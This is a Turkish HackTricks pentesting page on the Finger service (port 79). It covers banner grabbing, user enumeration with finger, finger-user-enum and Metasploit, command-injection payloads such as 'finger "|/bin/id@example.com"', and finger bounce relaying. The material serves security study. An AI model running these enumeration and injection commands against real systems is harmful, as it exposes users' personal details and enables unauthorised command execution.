79 - Pentesting Finger

Reading time: 2 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

Temel Bilgiler

Finger programı/hizmeti, bilgisayar kullanıcıları hakkında detaylar almak için kullanılır. Genellikle sağlanan bilgiler kullanıcının giriş adı, tam adı ve bazı durumlarda ek detayları içerir. Bu ek detaylar ofis konumu ve telefon numarasını (varsa), kullanıcının giriş yaptığı zamanı, hareketsizlik süresini (boşta kalma süresi), kullanıcının en son okuduğu e-posta zamanını ve kullanıcının plan ve proje dosyalarının içeriğini kapsayabilir.

Varsayılan port: 79

PORT   STATE SERVICE
79/tcp open  finger

Numaralandırma

Afiş Yakalama/Temel Bağlantı

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Kullanıcı numaralandırma

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatif olarak, pentestmonkey tarafından sağlanan finger-user-enum aracını kullanabilirsiniz, bazı örnekler:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap, varsayılan betikleri kullanarak bir betik çalıştırır

Metasploit, Nmap'tan daha fazla hile kullanır

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Komut yürütme

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Bir sistemi finger relay olarak kullanın

finger user@host@victim
finger @internal@external

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin